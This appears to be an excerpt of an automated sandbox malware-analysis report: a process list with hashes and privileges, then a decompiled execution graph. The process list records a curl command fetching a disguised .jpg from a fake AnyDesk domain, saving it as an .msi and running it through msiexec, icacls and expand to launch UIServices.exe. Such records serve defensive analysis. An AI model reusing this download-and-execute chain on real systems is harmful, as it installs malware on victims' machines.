                                                  Commandline:curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
                                                  Imagebase:0x7ff768f50000
                                                  File size:424448 bytes
                                                  MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:22
                                                  Start time:00:37:27
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /C %temp%\spclwow78x.msi
                                                  Imagebase:0x7ff707bb0000
                                                  File size:273920 bytes
                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:25
                                                  Start time:00:37:27
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /C %temp%\spclwow78x.msi
                                                  Imagebase:0x7ff707bb0000
                                                  File size:273920 bytes
                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:26
                                                  Start time:00:37:27
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:27
                                                  Start time:00:37:27
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:28
                                                  Start time:00:37:28
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
                                                  Imagebase:0x7ff79bf20000
                                                  File size:66048 bytes
                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:29
                                                  Start time:00:37:28
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                  Imagebase:0x7ff79bf20000
                                                  File size:66048 bytes
                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:30
                                                  Start time:00:37:28
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
                                                  Imagebase:0x7ff79bf20000
                                                  File size:66048 bytes
                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:31
                                                  Start time:00:37:30
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /C %temp%\spclwow78x.msi
                                                  Imagebase:0x7ff707bb0000
                                                  File size:273920 bytes
                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:32
                                                  Start time:00:37:30
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:33
                                                  Start time:00:37:31
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
                                                  Imagebase:0x7ff79bf20000
                                                  File size:66048 bytes
                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:34
                                                  Start time:00:37:31
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79
                                                  Imagebase:0xc70000
                                                  File size:59904 bytes
                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:35
                                                  Start time:00:37:33
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                                  Imagebase:0xc30000
                                                  File size:29696 bytes
                                                  MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:36
                                                  Start time:00:37:33
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:37
                                                  Start time:00:37:34
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\expand.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                                  Imagebase:0xc30000
                                                  File size:52736 bytes
                                                  MD5 hash:8F8C20238C1194A428021AC62257436D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:38
                                                  Start time:00:37:34
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:39
                                                  Start time:00:37:37
                                                  Start date:30/11/2022
                                                  Path:C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe"
                                                  Imagebase:0x7ff796fb0000
                                                  File size:5609472 bytes
                                                  MD5 hash:F65B1FC89A4324BEFDB6F24406BAEF6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:40
                                                  Start time:00:37:54
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                                                  Imagebase:0xc30000
                                                  File size:29696 bytes
                                                  MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:41
                                                  Start time:00:37:54
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:42
                                                  Start time:00:37:56
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD
                                                  Imagebase:0xc70000
                                                  File size:59904 bytes
                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:43
                                                  Start time:00:38:00
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                                  Imagebase:0xc30000
                                                  File size:29696 bytes
                                                  MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:44
                                                  Start time:00:38:01
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:45
                                                  Start time:00:38:02
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\expand.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                                  Imagebase:0xc30000
                                                  File size:52736 bytes
                                                  MD5 hash:8F8C20238C1194A428021AC62257436D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:46
                                                  Start time:00:38:02
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:47
                                                  Start time:00:38:05
                                                  Start date:30/11/2022
                                                  Path:C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe"
                                                  Imagebase:0x7ff6fbf70000
                                                  File size:5609472 bytes
                                                  MD5 hash:F65B1FC89A4324BEFDB6F24406BAEF6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:48
                                                  Start time:00:38:21
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                                                  Imagebase:0xc30000
                                                  File size:29696 bytes
                                                  MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:49
                                                  Start time:00:38:22
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:50
                                                  Start time:00:38:24
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9
                                                  Imagebase:0xc70000
                                                  File size:59904 bytes
                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:51
                                                  Start time:00:38:26
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                                  Imagebase:0x7ff70b1a0000
                                                  File size:29696 bytes
                                                  MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:52
                                                  Start time:00:38:26
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:53
                                                  Start time:00:38:27
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\expand.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                                  Imagebase:0xc30000
                                                  File size:52736 bytes
                                                  MD5 hash:8F8C20238C1194A428021AC62257436D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:54
                                                  Start time:00:38:27
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:57
                                                  Start time:00:38:30
                                                  Start date:30/11/2022
                                                  Path:C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
                                                  Imagebase:0x7ff642fb0000
                                                  File size:5609472 bytes
                                                  MD5 hash:F65B1FC89A4324BEFDB6F24406BAEF6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:58
                                                  Start time:00:38:46
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                                                  Imagebase:0xc30000
                                                  File size:29696 bytes
                                                  MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:59
                                                  Start time:00:38:47
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:0.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0.4%
                                                    Total number of Nodes:891
                                                    Total number of Limit Nodes:1
                                                    execution_graph 6215 7ffc23564a5c 6225 7ffc2356498f __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 6215->6225 6216 7ffc23564a8a 6217 7ffc235664b0 _CallSETranslator 13 API calls 6216->6217 6219 7ffc23564a8f 6217->6219 6218 7ffc23564a83 abort 6218->6216 6220 7ffc23564a9a 6219->6220 6221 7ffc235664b0 _CallSETranslator 13 API calls 6219->6221 6222 7ffc23564aae __FrameHandler3::GetHandlerSearchState 6220->6222 6223 7ffc23564aa7 abort 6220->6223 6221->6220 6223->6222 6224 7ffc2356f044 13 API calls Is_bad_exception_allowed 6224->6225 6225->6216 6225->6218 6225->6224 6226 7ffc2356f06c __FrameHandler3::FrameUnwindToEmptyState 13 API calls 6225->6226 6226->6225 6227 7ffc2356fc5c 6228 7ffc2356eff0 __CxxCallCatchBlock 14 API calls 6227->6228 6232 7ffc2356fc6f 6228->6232 6229 7ffc235664b0 _CallSETranslator 13 API calls 6230 7ffc2356fcb4 6229->6230 6231 7ffc235664b0 _CallSETranslator 13 API calls 6230->6231 6233 7ffc2356fcc4 6231->6233 6234 7ffc235620f0 __CxxCallCatchBlock 13 API calls 6232->6234 6235 7ffc2356fca0 __CxxCallCatchBlock 6232->6235 6234->6235 6235->6229 6239 7ffc23564270 6242 7ffc23565f80 6239->6242 6241 7ffc23564292 6243 7ffc23565f8f free 6242->6243 6244 7ffc23565f98 6242->6244 6243->6244 6244->6241 6245 7ffc23565570 6246 7ffc23565687 6245->6246 6247 7ffc2356558a 6245->6247 6248 7ffc2356eff0 __CxxCallCatchBlock 14 API calls 6247->6248 6249 7ffc2356558f 6248->6249 6250 7ffc23565604 __CxxCallCatchBlock 6249->6250 6251 7ffc235664b0 _CallSETranslator 13 API calls 6249->6251 6252 7ffc235664b0 _CallSETranslator 13 API calls 6250->6252 6253 7ffc23565598 6251->6253 6254 7ffc23565614 6252->6254 6253->6250 6256 7ffc235664b0 _CallSETranslator 13 API calls 6253->6256 6255 7ffc2356566e 6254->6255 6258 7ffc235664b0 _CallSETranslator 13 API calls 6254->6258 6257 7ffc235664b0 _CallSETranslator 13 API calls 6255->6257 6259 7ffc235655a9 6256->6259 6260 7ffc2356567a 6257->6260 6261 7ffc23565625 6258->6261 6259->6250 6263 7ffc235664b0 _CallSETranslator 13 API calls 6259->6263 6262 7ffc235664b0 _CallSETranslator 13 API calls 6260->6262 6261->6255 6264 7ffc235664b0 _CallSETranslator 13 API calls 6261->6264 6262->6246 6266 7ffc235655b8 6263->6266 6265 7ffc23565634 6264->6265 6267 7ffc23565658 6265->6267 6270 7ffc235664b0 _CallSETranslator 13 API calls 6265->6270 6268 7ffc235655dc 6266->6268 6271 7ffc235664b0 _CallSETranslator 13 API calls 6266->6271 6267->6255 6274 7ffc235664b0 _CallSETranslator 13 API calls 6267->6274 6268->6250 6269 7ffc235664b0 _CallSETranslator 13 API calls 6268->6269 6272 7ffc235655ee 6269->6272 6273 7ffc23565646 6270->6273 6275 7ffc235655ca 6271->6275 6276 7ffc235620f0 __CxxCallCatchBlock 13 API calls 6272->6276 6273->6267 6278 7ffc235664b0 _CallSETranslator 13 API calls 6273->6278 6274->6255 6275->6268 6279 7ffc235664b0 _CallSETranslator 13 API calls 6275->6279 6277 7ffc235655fb 6276->6277 6277->6250 6280 7ffc235664b0 _CallSETranslator 13 API calls 6277->6280 6278->6267 6279->6268 6280->6250 6284 7ffc23565270 6285 7ffc23565279 6284->6285 6287 7ffc235652a3 6284->6287 6286 7ffc235664b0 _CallSETranslator 13 API calls 6285->6286 6285->6287 6286->6287 6288 7ffc23566070 6289 7ffc235660a0 6288->6289 6290 7ffc2356616d 6288->6290 6299 7ffc2356df30 6289->6299 6292 7ffc23566161 free 6292->6290 6294 7ffc23566100 malloc 6295 7ffc23566158 free 6294->6295 6296 7ffc23566116 strcpy_s 6294->6296 6295->6292 6297 7ffc23566141 6296->6297 6298 7ffc23566146 InterlockedPushEntrySList 6296->6298 6297->6295 6298->6295 6302 7ffc2356df60 6299->6302 6303 7ffc235660ca 6302->6303 6304 7ffc2356dfa5 6302->6304 6303->6292 6303->6294 6311 7ffc235663c8 EnterCriticalSection 6304->6311 5530 7ffc2356f270 5531 7ffc2356f1f8 5530->5531 5532 7ffc2356f28c 5530->5532 5534 7ffc2356f23a 5531->5534 5535 7ffc2356f204 5531->5535 5565 7ffc2356f6b0 5532->5565 5536 7ffc2356f218 5534->5536 5559 7ffc23566378 5534->5559 5537 7ffc2356f209 5535->5537 5538 7ffc2356f224 5535->5538 5540 7ffc2356f20e 5537->5540 5541 7ffc2356f21d 5537->5541 5551 7ffc23566320 5538->5551 5540->5536 5548 7ffc23566364 5540->5548 5545 7ffc23566350 5541->5545 5568 7ffc235664cc 5545->5568 5599 7ffc23566460 5548->5599 5552 7ffc23566329 _DllMainCRTStartup 5551->5552 5612 7ffc23566394 5552->5612 5557 7ffc23566332 5557->5536 5560 7ffc23566380 5559->5560 5561 7ffc2356638a 5559->5561 5637 7ffc23566628 5560->5637 5561->5536 5564 7ffc235663e4 _DllMainCRTStartup DeleteCriticalSection 5564->5561 5566 7ffc2356f6d3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5565->5566 5567 7ffc2356f747 5565->5567 5566->5567 5567->5531 5569 7ffc235664eb GetLastError 5568->5569 5570 7ffc23566359 5568->5570 5584 7ffc2356682c 5569->5584 5570->5536 5572 7ffc235664fe 5573 7ffc23566572 SetLastError 5572->5573 5574 7ffc2356650e 5572->5574 5575 7ffc23566874 _DllMainCRTStartup 7 API calls 5572->5575 5573->5570 5574->5573 5576 7ffc2356651e 5575->5576 5576->5573 5577 7ffc23566522 calloc 5576->5577 5578 7ffc2356653e 5577->5578 5582 7ffc23566546 5577->5582 5580 7ffc23566874 _DllMainCRTStartup 7 API calls 5578->5580 5579 7ffc23566874 _DllMainCRTStartup 7 API calls 5581 7ffc23566569 free 5579->5581 5580->5582 5581->5573 5582->5579 5583 7ffc2356654a 5582->5583 5583->5581 5588 7ffc2356664c 5584->5588 5589 7ffc23566772 TlsGetValue 5588->5589 5590 7ffc2356668f 5588->5590 5590->5589 5591 7ffc235666bc LoadLibraryExW 5590->5591 5592 7ffc23566754 GetProcAddress 5590->5592 5593 7ffc235666dd GetLastError 5591->5593 5594 7ffc23566734 5591->5594 5592->5589 5597 7ffc23566765 5592->5597 5593->5590 5595 7ffc235666e8 wcsncmp 5593->5595 5594->5592 5596 7ffc2356674b FreeLibrary 5594->5596 5595->5590 5598 7ffc23566700 LoadLibraryExW 5595->5598 5596->5592 5597->5589 5598->5590 5598->5594 5600 7ffc2356636f 5599->5600 5601 7ffc23566474 5599->5601 5600->5536 5602 7ffc2356647e 5601->5602 5603 7ffc2356682c __vcrt_getptd_noinit 7 API calls 5601->5603 5607 7ffc23566874 5602->5607 5603->5602 5606 7ffc2356649f free 5606->5600 5608 7ffc2356664c __vcrt_InitializeCriticalSectionEx 6 API calls 5607->5608 5609 7ffc235668a2 5608->5609 5610 7ffc2356648e 5609->5610 5611 7ffc235668b4 TlsSetValue 5609->5611 5610->5600 5610->5606 5611->5610 5628 7ffc235668d0 5612->5628 5615 7ffc2356632e 5615->5557 5617 7ffc235665e0 5615->5617 5616 7ffc235663e4 _DllMainCRTStartup DeleteCriticalSection 5616->5615 5633 7ffc2356679c 5617->5633 5629 7ffc2356664c __vcrt_InitializeCriticalSectionEx 6 API calls 5628->5629 5630 7ffc23566906 5629->5630 5631 7ffc235663ac 5630->5631 5632 7ffc2356691b InitializeCriticalSectionAndSpinCount 5630->5632 5631->5615 5631->5616 5632->5631 5634 7ffc2356664c __vcrt_InitializeCriticalSectionEx 6 API calls 5633->5634 5636 7ffc235667c1 TlsAlloc 5634->5636 5638 7ffc23566637 5637->5638 5640 7ffc23566385 5637->5640 5641 7ffc235667e4 5638->5641 5640->5564 5642 7ffc2356664c __vcrt_InitializeCriticalSectionEx 6 API calls 5641->5642 5643 7ffc2356680b TlsFree 5642->5643 5645 7ffc2356e0f0 5653 7ffc2356e340 5645->5653 5647 7ffc2356e131 5651 7ffc235664b0 _CallSETranslator 13 API calls 5652 7ffc2356e126 terminate 5651->5652 5652->5647 5656 7ffc2356e370 _IsNonwritableInCurrentImage __C_specific_handler 5653->5656 5654 7ffc2356e105 5654->5647 5657 7ffc235664b0 5654->5657 5655 7ffc2356e42c RtlUnwindEx 5655->5656 5656->5654 5656->5655 5658 7ffc235664cc _DllMainCRTStartup 12 API calls 5657->5658 5659 7ffc235664b9 5658->5659 5660 7ffc235664be abort 5659->5660 5661 7ffc235664c5 5659->5661 5660->5661 5661->5651 5662 7ffc23565def 5663 7ffc23565e00 5662->5663 5678 7ffc23566190 5663->5678 5665 7ffc23565e11 5666 7ffc23566190 2 API calls 5665->5666 5667 7ffc23565e34 5666->5667 5668 7ffc23565e4b 5667->5668 5669 7ffc23565e85 5667->5669 5670 7ffc23565e5a RtlPcToFileHeader 5668->5670 5673 7ffc23565e6f 5668->5673 5671 7ffc23566190 2 API calls 5669->5671 5670->5673 5671->5673 5672 7ffc23565e7f 5673->5672 5674 7ffc23566190 2 API calls 5673->5674 5675 7ffc23565eca 5674->5675 5676 7ffc23566190 2 API calls 5675->5676 5677 7ffc23565eed 5676->5677 5679 7ffc235661cc RtlPcToFileHeader 5678->5679 5680 7ffc235661af 5678->5680 5681 7ffc235661f3 RaiseException 5679->5681 5682 7ffc235661e4 5679->5682 5680->5679 5681->5665 5682->5681 5683 7ffc2356fdf8 5686 7ffc2356f06c 5683->5686 5687 7ffc235664b0 _CallSETranslator 13 API calls 5686->5687 5688 7ffc2356f07a 5687->5688 5689 7ffc235654c0 5690 7ffc23565530 5689->5690 5694 7ffc235654d2 5689->5694 5692 7ffc235664b0 _CallSETranslator 13 API calls 5690->5692 5691 7ffc23565501 5707 7ffc2356efb0 5691->5707 5695 7ffc23565545 5692->5695 5694->5690 5694->5691 5700 7ffc235664b0 _CallSETranslator 13 API calls 5694->5700 5696 7ffc235664b0 _CallSETranslator 13 API calls 5695->5696 5698 7ffc2356554d 5696->5698 5701 7ffc23565558 5698->5701 5703 7ffc235664b0 _CallSETranslator 13 API calls 5698->5703 5699 7ffc235664b0 _CallSETranslator 13 API calls 5702 7ffc23565516 5699->5702 5700->5691 5704 7ffc235664b0 _CallSETranslator 13 API calls 5702->5704 5703->5701 5705 7ffc23565523 5704->5705 5706 7ffc235664b0 _CallSETranslator 13 API calls 5705->5706 5706->5690 5708 7ffc235664b0 _CallSETranslator 13 API calls 5707->5708 5709 7ffc2356efc1 5708->5709 5710 7ffc235664b0 _CallSETranslator 13 API calls 5709->5710 5711 7ffc2356efcc 5709->5711 5710->5711 5712 7ffc235664b0 _CallSETranslator 13 API calls 5711->5712 5713 7ffc23565511 5712->5713 5713->5699 5714 7ffc235652c0 5718 7ffc235652f4 5714->5718 5744 7ffc23565431 5714->5744 5717 7ffc23565497 5719 7ffc235664b0 _CallSETranslator 13 API calls 5717->5719 5717->5744 5720 7ffc23565324 5718->5720 5721 7ffc23565470 5718->5721 5719->5744 5722 7ffc235664b0 _CallSETranslator 13 API calls 5720->5722 5730 7ffc23565367 5720->5730 5720->5744 5721->5717 5724 7ffc235664b0 _CallSETranslator 13 API calls 5721->5724 5725 7ffc23565357 5722->5725 5724->5717 5728 7ffc235664b0 _CallSETranslator 13 API calls 5725->5728 5725->5744 5728->5730 5745 7ffc2356f084 5730->5745 5731 7ffc2356f06c __FrameHandler3::FrameUnwindToEmptyState 13 API calls 5732 7ffc2356539c 5731->5732 5751 7ffc2356f058 5732->5751 5735 7ffc2356f058 13 API calls 5739 7ffc235653ca 5735->5739 5736 7ffc2356544b 